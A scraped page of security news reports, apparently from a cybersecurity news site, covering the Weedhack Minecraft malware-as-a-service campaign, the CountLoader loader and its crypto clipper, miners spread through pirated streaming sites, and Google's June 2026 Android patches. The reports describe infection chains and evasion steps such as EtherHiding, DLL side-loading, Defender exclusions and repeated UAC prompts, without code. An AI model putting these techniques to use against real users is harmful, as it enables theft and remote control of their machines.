“A 70:1 amplifier is harmless if the memory is freed when the request completes. It becomes an attack because HTTP/2 lets the client hold the connection open almost for free, pinning every allocated byte for as long as they like.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Weedhack Attacks Minecraft Users, CountLoader Hits 86K, Miners Spread via Pirated Content

Cybersecurity researchers have flagged a new campaign targeting Minecraft players via YouTube to spread malware capable of gaining control of victims’ systems. The Minecraft-focused malware-as-a-service (MaaS) campaign has been codenamed Weedhack by McAfee Labs, stating the activity has been active since January 2026 and impersonates Minecraft clients and mods to infect users. In all, 3820 unique malicious JAR files and over 240 URLs responsible for distributing the malware have been identified. “This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs,” security researcher Aayush Tyagi said .

“We also found two YouTube channels and multiple videos that demonstrate Minecraft Mods and Clients and redirect viewers to these URLs.” Central to the campaign is an enterprise-grade dashboard (“weedhack[.]to”) that enables customers to view stolen credentials and system information, as well as remotely keep tabs on the compromised systems. Furthermore, it allows criminals to create custom payloads that can target Minecraft versions 1.21.0 to 1.21.11, not to mention inject the malware into legitimate Minecraft mods. The starting point of the attack is a malicious JAR file (“DonutDupe.jar”) downloaded from the malicious websites. The file then retrieves details of the command-and-control (C2) server domain using a known technique called EtherHiding , which employs the Ethereum blockchain as a dead drop resolver.

In the next stage, the malware contacts the C2 server to fetch another Java-based JAR payload (“Elevator.jar”) that collects system information, configures Microsoft Defender exclusions, and serves as a conduit for dropping two additional JAR payloads. The third JAR payload (“SecurityManager.jar”) establishes persistence and acts as a stager for the final component (“Component.jar”) that deploys the remote access features. The threat actors behind the tooling leverage a Telegram channel to advertise their warez, broadcast updates, and provide customer support. The channel has more than 850 members.

The tool, for its part, comes in two tiers - Free, which includes a comprehensive infostealer that can target Minecraft session IDs and four Minecraft launchers; capture screenshots; and harvest files, system information, cookies, and passwords from 36 different web browsers, data from 56 browser-based cryptocurrency wallets and 12 desktop wallet apps, and credentials for Discord, Steam, and Telegram. Premium, which starts at $4.99 per month (or $24.99 for a lifetime license) and offers additional remote access capabilities, such as webcam access, keylogging, reverse shell execution, screen sharing with keyboard and mouse access, and file uploads and downloads. Attack chains revolve around SEO poisoning and YouTube videos containing descriptions that embed links to malicious Minecraft Clients to target unsuspecting users. The majority of Weedhack infections have been identified in the U.S., followed by Germany, India, the U.K., Italy, Vietnam, Canada, Norway, Sweden, Finland, and Spain.

“One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated malware for free,” Tyagi said. “This difference in cost and ease of access with detailed tutorials on how to use the malware significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. Both of these factors complement each other and make the campaign much more lethal.” McAfee Labs said it has also observed the malware acting as a trigger for cyberbullying, where the customers, who appear to be teenagers and young adults, are weaponizing its remote access capabilities to threaten, harass, and monitor their victims.

They have found a way to record victims via their webcams and shared the videos on the Telegram channel as “trophies.” CountLoader Delivers Crypto Clipper The disclosure comes as the cybersecurity company shed light on a large-scale CountLoader campaign that’s estimated to have compromised 86,000 unique machines. CountLoader is a JavaScript loader that’s typically distributed via cracked software distribution sites. It’s known to deploy various payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. Of these compromises, approximately 9,000 infections are said to have resulted from the malware spreading via USB drives and removable media.

McAfee Labs said the highest number of infections was observed in India, followed by Indonesia, the U.S., and several countries across Southeast Asia, adding it was able to successfully sinkhole the malware communication infrastructure by registering a fake C2 domain. “The infection begins when an EXE file is executed,” the company said . “This file launches a PowerShell command, which downloads and executes an obfuscated JavaScript loader known as CountLoader. The loader is executed using ‘mshta.exe.’” Once executed, CountLoader sets up persistence, communicates with the C2 server, attempts to spread via USB drives, and awaits further instructions from the C2 server to download and execute payloads.

The final payload deployed in the latest set of attacks is a cryptocurrency clipper malware that hijacks clipboard content to redirect cryptocurrency transactions. Pirated Content Leads to Cryptocurrency Miners The findings also follow the discovery of a years-long campaign that has used illegal movie and TV show streaming sites to distribute a cryptocurrency miner under the guise of a fake update for a video player plugin. The bogus update downloads a ZIP archive, which then uses DLL side-loading to drop a fork of SilentCryptoMiner . The malware is equipped with a wide range of capabilities - Configure Defender exclusions, terminate Microsoft’s Malicious Software Removal Tool, and disable automatic hibernation and sleep mode to maximize the miner’s potential runtime on the device.

Repeatedly trigger User Account Control (UAC) prompts until the process is successfully executed with elevated privileges. Initiate a watchdog component that ensures the uninterrupted operation of the miner. Run a RAT agent that provides remote control capabilities, including running arbitrary commands, launching EXE files using “explorer.exe,” and running shellcode. Launch an XMRig-based CPU and a GPU miner.

“The archive contained a legitimate executable, HLS Installer.874.exe, alongside a malicious DLL. Launching the EXE triggered a DLL side-loading mechanism, injecting the malicious module into a legitimate program process and executing code within its context,” Kaspersky said . “The library contained the logic for deploying the miner and establishing persistence on the device.” It’s assessed that the activity is a continuation of a campaign that was documented by NTT Security in April 2023, which used fake browser crash warnings to drop a cryptocurrency miner. “The threat actors leverage a variety of sites, ranging from online libraries to movie and TV show streaming platforms,” Kaspersky said.

“There is no telling what channels they will use to distribute the malicious archive in the future. However, the current case shows that users visiting pirated websites continue to take a serious risk.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Google June 2026 Android Update Patches 124 Flaws, One Actively Exploited

Google on Monday released patches for 124 security vulnerabilities impacting its Android operating system for the month of June 2026, including one high-severity flaw in the Framework component that has come under active exploitation. Tracked as CVE-2025-48595 (CVSS score: 8.4), the security flaw has been described as a case of privilege escalation without requiring any user interaction. The vulnerability impacts devices running Android versions 14, 15, 16, and 16 QPR2 (Quarterly Platform Release 2). “In multiple locations, there is a possible way to achieve code execution due to an integer overflow,” according to a description of the vulnerability on CVE.org.

“This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.” Google has acknowledged there are indications that CVE-2025-48595 may be under “limited, targeted exploitation.” As is typically the case, the tech giant did not reveal any specifics about who may have been behind the activity, the targets affected, and the scale of such efforts. That said, similar flaws have been weaponized by commercial spyware vendors to target high-profile individuals as part of extremely targeted attacks. Elsewhere, a number of vulnerabilities have been patched in the System component, the most severe of which could lead to local escalation of privilege with no additional execution privileges needed.

Google has released two sets of patches - 2026-06-01 and 2026-06-05 security patch levels - with the latter including all fixes from the first set, along with patches for kernel and third-party chipset components from Imagination Technologies, MediaTek, Qualcomm, and Unisoc. Update The U.S. Cybersecurity and Infrastructure Security Agency (CISA), on June 2, 2026, added CVE-2025-48595 to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by June 5, 2026. Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.